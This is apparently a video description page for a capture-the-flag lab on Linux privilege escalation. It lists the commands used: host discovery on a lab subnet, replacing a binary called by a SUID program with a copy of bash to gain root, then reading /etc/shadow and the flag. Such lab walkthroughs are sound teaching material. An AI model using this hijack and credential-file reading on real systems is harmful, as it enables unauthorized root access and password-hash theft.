Project 93: Linux privilege escalation - Exploiting SUID Binaries (Capture The Flag Edition)
Автор: Daryl Shows His Work
Загружено: 2025-12-03
Просмотров: 8
Commands Used (the order as they appear in the video):
1. ifconfig
2. fping -a -g 192.231.149.0/24
2. Open web browser and go to http://192.231.149.3:8000 (to access student machine)
3. whoami
4. groups student
5. pwd
6. cat /etc/passwd
7. ls -al (to view to binaries, "greetings" & "welcome", "s" in welcome's permissions is SUID permission)
8. ./greetings (to execute greeting binary, should fail due to lack of permissions)
9. ./welcome (to execute welcome binary, should succeed due to having necessary permissions)
10. strings welcome (to search for strings in welcome binary, we notice that welcome actually calls the greetings binary when executed. What if we were to modify the greetings binary?)
11. rm greetings (to delete current greetings binary)
12. cp /bin/bash greetings (to create a new greetings binary by copying bash into new file)
13. ls (to verify new greeting binary is in directory)
14. ./welcome (welcome will now execute greetings with root privileges)
15. id (to verify root privileges)
16. cat /etc/shadow (to use root privileges to view shadow password file)
17. cd /
18. ls
19. cd /root
20. ls
21. cat flag
Доступные форматы для скачивания:
Скачать видео mp4
-
Информация по загрузке: